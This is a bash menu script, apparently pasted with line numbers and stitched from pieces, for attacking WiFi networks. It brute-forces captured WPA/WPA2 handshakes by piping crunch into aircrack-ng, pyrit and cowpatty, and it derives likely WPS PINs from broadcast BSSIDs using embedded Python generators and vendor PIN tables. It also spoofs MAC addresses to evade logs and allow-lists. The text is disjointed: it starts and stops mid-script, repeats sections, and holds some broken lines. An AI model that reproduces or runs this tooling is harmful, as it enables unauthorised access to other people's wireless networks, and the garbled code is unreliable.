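  echo $RED"eg: /root/Desktop/sky12345.cap"
  read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  clear
  # Chosen user input options
  ############################
  echo
  echo $RED"You've chosen:"
  echo "=============="
  echo $RED"Minimum length password$STAND: $PasswordLengthMin"
  echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
  echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
  echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
  echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  echo $RED"essid$STAND: $essid"
  echo
  echo $RED"Commands to launch:"
  echo "==================="
  echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -"
  echo
  # Launch chosen commands/options
  #################################
  read -p $GREEN"Press enter to start"$STAND
  clear
  crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | aircrack-ng $CapNameLocation -e $essid -w -
fi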
# Option 5: generated-candidate attack on a capture file (crunch | pyrit
# attack_passthrough). Same prompts as option 4; candidates from crunch are read
# by pyrit on stdin (-i -).
# NOTE(review): every prompted value is expanded unquoted on the command line.
if [[ $option == "5" ]]; then
clear
echo $RED
echo "############################################################################"
echo "# #"
echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
echo "#$STAND (Crunch + Pyrit) $RED#"
echo "# #"
echo "############################################################################"$STAND
echo
echo $RED"eg: abcdef23456789"
read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
echo
echo $RED"eg: 10"
read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
echo
echo $RED"eg: 10"
read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
echo
echo $RED"eg:"
echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
echo $RED"-s XXXXXXXXXX = Start point."
read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
echo
echo $RED"eg: sky12345"
read -p $GREEN"Access Point essid$STAND: " essid
echo
echo $RED"eg: /root/Desktop/sky12345.cap"
read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
clear
# Chosen user input options
############################
echo
echo $RED"You've chosen:"
echo "=============="
echo $RED"Minimum length password$STAND: $PasswordLengthMin"
echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
echo $RED"essid$STAND: $essid"
echo
echo $RED"Commands to launch:"
echo "==================="
echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough"
echo
# Launch chosen commands/options
#################################
read -p $GREEN"Press enter to start"$STAND
clear
crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -r $CapNameLocation -i - attack_passthrough
fi
# Option 6: generated-candidate attack using a crunch | pyrit | cowpatty pipeline.
# Same prompts as option 4; pyrit's passthrough output for the given ESSID is read
# by cowpatty (-d -) and checked against the capture file.
# NOTE(review): every prompted value is expanded unquoted on the command line.
if [[ $option == "6" ]]; then
clear
echo $RED
echo "############################################################################"
echo "# #"
echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
echo "#$STAND (Crunch + Pyrit + Cowpatty) $RED#"
echo "# #"
echo "############################################################################"$STAND
echo
echo $RED"eg: abcdef23456789"
read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
echo
echo $RED"eg: 10"
read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
echo
echo $RED"eg: 10"
read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
echo
echo $RED"eg:"
echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
echo $RED"-s XXXXXXXXXX = Start point."
read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
echo
echo $RED"eg: sky12345"
read -p $GREEN"Access Point essid$STAND: " essid
echo
echo $RED"eg: /root/Desktop/sky12345.cap"
read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
clear
# Chosen user input options
############################
echo
echo $RED"You've chosen:"
echo "=============="
echo $RED"Minimum length password$STAND: $PasswordLengthMin"
echo $RED"Maximum length of password$STAND: $PasswordLengthMax"
echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
echo $RED"essid$STAND: $essid"
echo
echo $RED"Commands to launch:"
echo "==================="
echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
echo
# Launch chosen commands/options
#################################
read -p $GREEN"Press enter to start"$STAND
clear
crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
fi
  1439. ;;
  1440. 7)
  1441. ###########################
  1442. # Show Recovered Passkeys #
  1443. ###########################
  1444. gnome-open $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1445. ;;
  1446. 8)
  1447. ##############################################################################
  1448. # Check In Recovered-WPA-Passkeys.txt To See If You Already Have The Passkey #
  1449. ##############################################################################
  1450. ###################
  1451. # Passkey Checker #
  1452. ###################
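# [8] Passkey checker: look up an access point in the recovered-passkey log by
# BSSID or ESSID and print the matching record with its neighbouring lines.
# Reads:  RED, GREEN, BLUE, STAND (colour codes), HOME.
# Writes: option, SEARCHbssid, SEARCHessid, CONFIRM.
clear
echo "${RED}How would you like to search."
echo "${GREEN}[1]${BLUE} = Search using the bssid."
echo "${GREEN}[2]${BLUE} = Search using the essid."
echo "${GREEN}[0]${BLUE} = Return To Previous Menu."
echo "${GREEN}1, 2 or 0?${STAND}"
read -r option

if [[ $option == "1" ]]; then
  while true; do
    echo -n "${GREEN}Please input the bssid of the access point you would like to check for?${STAND}: "
    read -r -e SEARCHbssid
    # The search term is quoted, matched literally (-F) and placed after "--", so it
    # can be neither a regular expression nor a grep option. An empty entry is
    # skipped: unquoted, it made grep take the file name as the pattern and wait on
    # stdin; quoted, an empty pattern would match every line of the log.
    if [[ -n "$SEARCHbssid" ]]; then
      grep -F -B 1 -A 2 -- "$SEARCHbssid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
    fi
    echo
    echo -n "Would you like to search again? (y or n): "
    read -r -e CONFIRM
    case "$CONFIRM" in
      n|N|NO|no|No) break ;;
      *) echo "" ;;
    esac
  done
fi
if [[ $option == "2" ]]; then
  while true; do
    echo -n "${GREEN}Please input the essid of the access point you would like to check for?${STAND}: "
    read -r -e SEARCHessid
    # Same handling as the BSSID search: literal match, never an option, empty skipped.
    if [[ -n "$SEARCHessid" ]]; then
      grep -F -A 3 -- "$SEARCHessid" "$HOME/scrypta/Recovered-WPA-Passkeys.txt"
    fi
    echo
    echo -n "Would you like to search again? (y or n): "
    read -r -e CONFIRM
    case "$CONFIRM" in
      n|N|NO|no|No) break ;;
      *) echo "" ;;
    esac
  done
fi
if [[ $option == "0" ]]; then
  echo "Returning To Menu"
fi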
  1496. ;;
  1497. 0) exit 0;;
  1498. *) echo "You've chosen an invalid option, please choose again";
  1499. echo "Press [Enter] to continue. . ." ; read ;;
  1500. esac
  1501. done#!/bin/bash
  1502.  
  1503.  
  1504.  
  1505. RED=$(tput setaf 1 && tput bold)
  1506. GREEN=$(tput setaf 2 && tput bold)
  1507. STAND=$(tput sgr0)
  1508. BLUE=$(tput setaf 6 && tput bold)
  1509.  
  1510. while :
  1511. do
  1512.  
  1513. ###### Create scrypta storage folder if it doesn't exist ######
  1514.  
  1515. if [ -d $HOME/scrypta ];
  1516. then
  1517. echo ""
  1518. else
  1519. mkdir $HOME/scrypta
  1520. mkdir $HOME/scrypta/temp
  1521. mkdir $HOME/scrypta/Captured_Handshakes
  1522. mkdir $HOME/scrypta/Client_Scans
  1523. fi
  1524.  
  1525. ###### Delete Missed Files In The Temp Directory ######
  1526.  
  1527. rm $HOME/scrypta/temp/*.txt &> /dev/null
  1528. rm $HOME/scrypta/temp/*.py &> /dev/null
  1529. rm $HOME/scrypta/temp/*.ivs &> /dev/null
  1530. rm $HOME/scrypta/temp/*.cap &> /dev/null
  1531. rm $HOME/scrypta/temp/*.xor &> /dev/null
  1532. rm $HOME/scrypta/temp/*.csv &> /dev/null
  1533. rm $HOME/scrypta/temp/*.netxml &> /dev/null
  1534. rm $HOME/scrypta/temp/arp-packet &> /dev/null
  1535. rm $HOME/scrypta/temp/*.sh &> /dev/null
  1536.  
  1537. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
  1538.  
  1539. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
  1540.  
  1541. if [ -s $mon0mac ]
  1542. then
  1543. MonitorModeStatus=$(echo Networking Mode Enabled)
  1544. else
  1545. MonitorModeStatus=$(echo Attack Mode Enabled)
  1546. fi
  1547.  
  1548. ###### System Environment Options Menu ######
  1549. clear
  1550. echo $RED"#########################################"
  1551. echo "# $STAND scrypta $RED#"
  1552. echo "#########################################"
  1553. echo "# #"
  1554. echo "#$GREEN [1]$BLUE WiFi Adapter Selection $RED#"
  1555. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode $RED#"
  1556. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
  1557. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake $RED#"
  1558. echo "#$GREEN [5]$BLUE WEP Attacks $RED#"
  1559. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files $RED#"
  1560. echo "#$GREEN [7]$BLUE Show Recovered Passkeys $RED#"
  1561. echo "#$GREEN [8]$BLUE Recovered Passkey Checker $RED#"
  1562. echo "# #"
  1563. echo "#########################################"
  1564. echo ""
  1565. echo "Chosen Interface$STAND: $wlanX"
  1566. echo $RED"System Mode$STAND: $MonitorModeStatus"
  1567. echo $RED"MAC address for mon0$STAND: $mon0mac"
  1568. echo ""
  1569. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
  1570. echo
  1571. case $ChosenOption in
  1572.  
  1573. 1)
  1574. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
  1575.  
  1576. cd $HOME/scrypta/temp
  1577. clear
  1578. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1 -s ": ")
  1579. clear
  1580. echo $RED"Available WiFi Adapters.$STAND"
  1581. echo ""
  1582. echo "$Presented_WiFi_Adapters"
  1583. echo ""
  1584. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
  1585. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
  1586. echo ""
  1587. echo ""
  1588. echo $RED"You've chosen:$STAND $wlanX"
  1589. sleep 1
  1590. cd
  1591.  
  1592. ;;
  1593.  
  1594. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
  1595.  
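  2)
    ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
    # Switches the adapter chosen under menu option 1 ($wlanX) between
    # "networking" mode (monitor interfaces stopped, network-manager started)
    # and "attack" mode (airmon-ng started on the adapter, mon0 brought up).
    # Both paths assign a random MAC with macchanger, so MAC-keyed logs and
    # allow-lists on the network side will not show the adapter's real address.

    clear
    echo "${RED}#########################################"
    echo "# #"
    echo "# ${GREEN}[1]${BLUE} Enable Networking Mode ${RED} #"
    echo "# ${GREEN}[2]${BLUE} Enable Attack Mode ${RED} #"
    echo "# ${GREEN}[0]${BLUE} Return To Main Menu ${RED} #"
    echo "# #"
    echo "#########################################${STAND}"
    echo ""
    read -r -s -n1 -p "${GREEN}Choose an option, 1 or 2?:${STAND} " option

    if [[ ( $option == "1" || $option == "2" ) && -z $wlanX ]]; then
      # Without an adapter name every ifconfig/macchanger call below would
      # run with a missing argument.
      echo ""
      echo "${RED}No WiFi adapter selected, choose one with option 1 first.${STAND}"
      sleep 3
    elif [[ $option == "1" ]]; then
      clear
      echo "${RED}Putting the system into networking mode${STAND}"
      # Stop every monitor interface an earlier run may have left behind.
      for mon_if in mon5 mon4 mon3 mon2 mon1 mon0; do
        airmon-ng stop "$mon_if" > /dev/null
      done
      # This call used to pass the literal string "wlanX", so the selected
      # adapter itself was never handed back; it now uses the variable.
      airmon-ng stop "$wlanX"
      echo "${RED}Please wait...${STAND}"
      ifconfig "$wlanX" down
      wlanFakeMAC=$(macchanger -r "$wlanX" | grep "New" | cut -c 16-32)
      ifconfig "$wlanX" hw ether "$wlanFakeMAC"
      ifconfig "$wlanX" up
      sleep 1
      service network-manager start
      echo ""
      echo "${RED}Networking mode should now be enabled, A fake MAC address has also been set.${STAND}"
      sleep 3
    elif [[ $option == "2" ]]; then
      clear
      echo "${RED}Putting the system into attack mode${STAND}"
      echo "${RED}Please wait...${STAND}"
      echo ""
      for mon_if in mon5 mon4 mon3 mon2 mon1 mon0; do
        airmon-ng stop "$mon_if" > /dev/null
      done
      ifconfig "$wlanX" down

      read -r -s -n1 -p "${GREEN}Would you like to disable processes that might cause issue's Y/n?.${STAND} " KillProcesses
      if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
        echo ""
        echo "${RED}Please wait...${STAND}"
        for proc_name in NetworkManager wpa_supplicant; do
          # pidof prints nothing when the process is not running; calling
          # kill with no PID would only produce a usage error.
          if proc_pids=$(pidof "$proc_name"); then
            # shellcheck disable=SC2086 -- pidof may return several PIDs
            kill $proc_pids
          fi
          sleep 2
        done
      fi

      ifconfig "$wlanX" up
      sleep 1
      airmon-ng start "$wlanX"
      echo "${RED}Please wait...${STAND}"
      sleep 1
      ifconfig "$wlanX" down
      sleep 1
      ifconfig mon0 down
      # macchanger picks the random address; the same value is then applied
      # to mon0 so both interfaces present one MAC.
      wlanMAC1=$(macchanger -r "$wlanX" | grep "New" | cut -c 16-32)
      ifconfig "$wlanX" hw ether "$wlanMAC1"
      echo ""
      sleep 1
      macchanger --mac "$wlanMAC1" mon0 > /dev/null
      ifconfig "$wlanX" up
      ifconfig mon0 up
      echo ""
      echo "${RED}MAC address for ${wlanX}:${STAND}"
      macchanger -s "$wlanX"
      echo ""
      echo "${RED}MAC address for mon0:${STAND}"
      macchanger -s mon0
      echo ""
      echo "${RED}A Random MAC address has been set,${STAND} ${wlanX}${RED} and${STAND} mon0${RED} should now have the same fake MAC address.${STAND}"
      echo ""
      echo "${RED}Attack Mode Should Now Be Enabled.${STAND}"
      sleep 3
    fi

    ;;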
  1684.  
  1685. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
  1686.  
  1687. 3)
  1688. ###### [3] Attack A WPS Enabled Access Point ######
  1689. cd $HOME/scrypta/temp
  1690. clear
  1691. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
  1692.  
  1693. ############## WPSpin.py ##############
  1694. echo '
  1695. import sys
  1696.  
  1697. VERSION = 1
  1698. SUBVERSION = 0
  1699.  
  1700. def usage():
  1701. print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
  1702. print "[*] Usage : python WPSpin.py 123456"
  1703. sys.exit(0)
  1704.  
  1705. def wps_pin_checksum(pin):
  1706. accum = 0
  1707.  
  1708. while(pin):
  1709. accum += 3 * (pin % 10)
  1710. pin /= 10
  1711. accum += pin % 10
  1712. pin /= 10
  1713. return (10 - accum % 10) % 10
  1714.  
  1715. try:
  1716. if (len(sys.argv[1]) == 6):
  1717. p = int(sys.argv[1] , 16) % 10000000
  1718. print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
  1719. else:
  1720. usage()
  1721. except Exception:
  1722. usage()
  1723. ' > WPSpin.py
  1724.  
  1725. ############## easybox_wps.py ##############
  1726.  
  1727. echo '#!/usr/bin/env python
  1728. import sys, re
  1729.  
  1730. def gen_pin (mac_str, sn):
  1731. mac_int = [int(x, 16) for x in mac_str]
  1732. sn_int = [0]*5+[int(x) for x in sn[5:]]
  1733. hpin = [0] * 7
  1734.  
  1735. k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
  1736. k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
  1737. hpin[0] = k1 ^ sn_int[9];
  1738. hpin[1] = k1 ^ sn_int[8];
  1739. hpin[2] = k2 ^ mac_int[9];
  1740. hpin[3] = k2 ^ mac_int[10];
  1741. hpin[4] = mac_int[10] ^ sn_int[9];
  1742. hpin[5] = mac_int[11] ^ sn_int[8];
  1743. hpin[6] = k1 ^ sn_int[7];
  1744. pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
  1745.  
  1746. # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
  1747. # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
  1748. accum = 0
  1749. t = pin
  1750. while (t):
  1751. accum += 3 * (t % 10)
  1752. t /= 10
  1753. accum += t % 10
  1754. t /= 10
  1755. return "%i%i" % (pin, (10 - accum % 10) % 10)
  1756.  
  1757. def main():
  1758. if len(sys.argv) != 2:
  1759. sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
  1760.  
  1761. mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
  1762. if len(mac_str) != 12:
  1763. sys.exit("check MAC format!\n")
  1764.  
  1765. sn = "R----%05i" % int(mac_str[8:12], 16)
  1766. print "derived serial number:", sn
  1767. print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])
  1768. print "WPS pin:", gen_pin(mac_str, sn)
  1769.  
  1770. if __name__ == "__main__":
  1771. main()
  1772. ' > easybox_wps.py
  1773.  
  1774. ############## End Of Create WPSpin.py And easybox_wps.py ##############
  1775.  
  1776. ############## Start Of Target Selection And Pin Generation ##############
  1777.  
  1778. clear
  1779. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
  1780. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
  1781. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
  1782. sed -i ''1,6d';'$d'' WashScan.txt
  1783.  
  1784. ############## Start Of Loop Section ##############
  1785.  
  1786. while true
  1787. do
  1788.  
  1789. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1 -s ': ' | sed '$d')
  1790. clear
  1791. echo $RED"Available Access Points."$STAND
  1792. echo ""
  1793. echo "$Presented_APs"
  1794. echo ""
  1795. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
  1796.  
  1797. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
  1798. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1799. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1800. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1801. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
  1802. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
  1803. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
  1804. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
  1805. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
  1806.  
  1807. ############## End Of Target Selection And Pin Generation ##############
  1808.  
  1809. ############## Start Of Choose A MAC Address Options ##############
  1810.  
  1811. clear
  1812. echo $RED"Please choose a MAC address option:$STAND"
  1813. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
  1814. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
  1815. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
  1816. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
  1817.  
  1818. if [[ $option == "1" ]]; then
  1819. clear
  1820. echo $RED"Auto Setting A Random MAC Address.$STAND"
  1821. echo $RED"Please wait..."$STAND
  1822. ifconfig $wlanX down
  1823. ifconfig $wlanX down
  1824. sleep 1
  1825. ifconfig mon0 down
  1826. wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
  1827. ifconfig $wlanX hw ether $wlanMAC2
  1828. echo ""
  1829. sleep 1
  1830. macchanger --mac $wlanMAC2 mon0
  1831. ifconfig $wlanX up
  1832. ifconfig mon0 up
  1833. echo ""
  1834. echo $RED"MAC address for$STAND $wlanX:"
  1835. macchanger -s $wlanX
  1836. echo ""
  1837. echo $RED"MAC address for$STAND mon0:"
  1838. macchanger -s mon0
  1839. echo ""
  1840. echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
  1841. echo ""
  1842. sleep 4
  1843. fi
  1844.  
  1845. if [[ $option == "2" ]]; then
  1846. clear
  1847. echo $RED"Set A User specified MAC Address.$STAND"
  1848. echo $RED"Please wait..."$STAND
  1849. ifconfig $wlanX down
  1850. ifconfig mon0 down
  1851. echo ""
  1852. echo $RED"Setting a random MAC address."$STAND
  1853. macchanger -r $wlanX
  1854. echo ""
  1855. read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
  1856. ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
  1857. macchanger --mac $SpecifiedInterfaceMAC mon0
  1858. ifconfig $wlanX up
  1859. ifconfig mon0 up
  1860. echo ""
  1861. echo $RED"MAC address for$STAND $wlanX:"$STAND
  1862. macchanger -s $wlanX
  1863. echo ""
  1864. echo $RED"MAC address for$STAND mon0:"$STAND
  1865. macchanger -s mon0
  1866. echo ""
  1867. sleep 2
  1868. echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
  1869. echo ""
  1870. echo $RED"Attack Mode Should Now Be Enabled."$STAND
  1871. sleep 2
  1872. fi
  1873.  
  1874. if [[ $option == "3" ]]; then
  1875. echo ""
  1876. fi
  1877.  
  1878. ############## End Of Choose A MAC Address Options ##############
  1879.  
  1880. ############## Start Of Review Information ##############
  1881.  
  1882. clear
  1883. echo $RED"Review Information."$STAND
  1884. echo ""
  1885. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
  1886. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
  1887. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
  1888. echo ""
  1889. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
  1890. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
  1891. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
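  1892. ############## Start Of WPSPIN-1.3 Default Pin Generator ##############
        # Every candidate below is computed from the BSSID/ESSID the access point broadcasts, or looked up
        # by the first three bytes of the BSSID; disabling WPS PIN enrolment on the access point is the mitigation.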
  1893.  
  1894. ESSID=$(echo $AP_essid)
  1895. BSSID=$(echo $AP_bssid)
  1896.  
  FUNC_CHECKSUM(){
    # Appends the WPS PIN check digit to the global $PIN.
    # Globals:  PIN (read, then rewritten as PIN + check digit);
    #           ACCUM, DIGIT, CHECKSUM, RESTE (written).
    # Input:    callers in this script set PIN to 10 x a seven-digit value, so
    #           the units digit is 0 on entry and the addition fills it in.
    # Method:   digits are weighted 3,1,3,1,... from the left of the 8-digit
    #           number; the check digit brings the weighted sum to a multiple
    #           of 10. RESTE is that sum mod 10 recomputed over all 8 digits.
    # Returns:  non-zero when RESTE is 0 (the status expr gives for a zero
    #           result), zero otherwise.
    local place weight

    # First pass: the seven leading digits only.
    ACCUM=0
    weight=3
    for place in 10000000 1000000 100000 10000 1000 100 10; do
      ACCUM=$(( ACCUM + weight * ( ( PIN / place ) % 10 ) ))
      weight=$(( 4 - weight ))   # alternate 3 -> 1 -> 3 ...
    done

    DIGIT=$(( ACCUM % 10 ))
    CHECKSUM=$(( ( 10 - DIGIT ) % 10 ))
    PIN=$(( PIN + CHECKSUM ))

    # Second pass: all eight digits, check digit included.
    ACCUM=0
    weight=3
    for place in 10000000 1000000 100000 10000 1000 100 10 1; do
      ACCUM=$(( ACCUM + weight * ( ( PIN / place ) % 10 ) ))
      weight=$(( 4 - weight ))
    done

    RESTE=$(( ACCUM % 10 ))
    (( RESTE != 0 ))
  }
  1925.  
  1926. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
  1927.  
  1928. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
  1929.  
  1930. MAC=$(echo $FINBSSID | tr -d ':')
  1931.  
  1932. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
  1933.  
  1934. FINESSID=$(echo $ESSID | cut -d '-' -f2)
  1935.  
  1936. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
  1937.  
  1938. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
  1939.  
  1940. MACESSID=$(echo $PAREMAC$FINESSID)
  1941.  
  1942. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
  1943.  
  1944. PIN=`expr 10 '*' $STRING`
  1945.  
  1946. FUNC_CHECKSUM
  1947.  
  1948. PINWPS1=$(printf '%08d\n' $PIN)
  1949.  
  1950. STRING2=`expr $STRING '+' 8`
  1951. PIN=`expr 10 '*' $STRING2`
  1952.  
  1953. FUNC_CHECKSUM
  1954.  
  1955. PINWPS2=$(printf '%08d\n' $PIN)
  1956.  
  1957. STRING3=`expr $STRING '+' 14`
  1958. PIN=`expr 10 '*' $STRING3`
  1959.  
  1960. FUNC_CHECKSUM
  1961.  
  1962. PINWPS3=$(printf '%08d\n' $PIN)
  1963.  
  1964. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
  1965.  
  1966. then
  1967.  
  1968. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
  1969.  
  1970. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
  1971.  
  1972. STRING4=`expr $RAIZ '+' 7`
  1973.  
  1974. PIN=`expr 10 '*' $STRING4`
  1975.  
  1976. FUNC_CHECKSUM
  1977.  
  1978. PINWPS4=$(printf '%08d\n' $PIN)
  1979.  
  1980. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
  1981. PIN4REAVER=$PINWPS4
  1982. else
  1983. case $CHECKBSSID in
  1984. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
  1985. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1
  1986. $RED"Other Possible Pin"$RED:$STAND $PINWPS2
  1987. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
  1988. PIN4REAVER=$PINWPS1
  1989. ;;
  1990. 001915)
  1991. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  1992. PIN4REAVER=12345670
  1993. ;;
  1994. 404A03)
  1995. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
  1996. PIN4REAVER=11866428
  1997. ;;
  1998. F43E61 | 001FA4)
  1999. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  2000. PIN4REAVER=12345670
  2001. ;;
  2002. 001A2B)
  2003. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  2004. then
  2005. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
  2006. PIN4REAVER=88478760
  2007. else
  2008. echo -e "PIN POSSIBLE... > $PINWPS1"
  2009. PIN4REAVER=$PINWPS1
  2010. fi
  2011. ;;
  2012. 3872C0)
  2013. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  2014. then
  2015. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
  2016. PIN4REAVER=18836486
  2017. else
  2018. echo -e "PIN POSSIBLE > $PINWPS1"
  2019. PIN4REAVER=$PINWPS1
  2020. fi
  2021. ;;
  2022. FCF528)
  2023. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
  2024. PIN4REAVER= 20329761
  2025. ;;
  2026. 3039F2)
  2027. echo -e "several possible PINs, ranked in order>
  2028. 16538061 16702738 18355604 88202907 73767053 43297917"
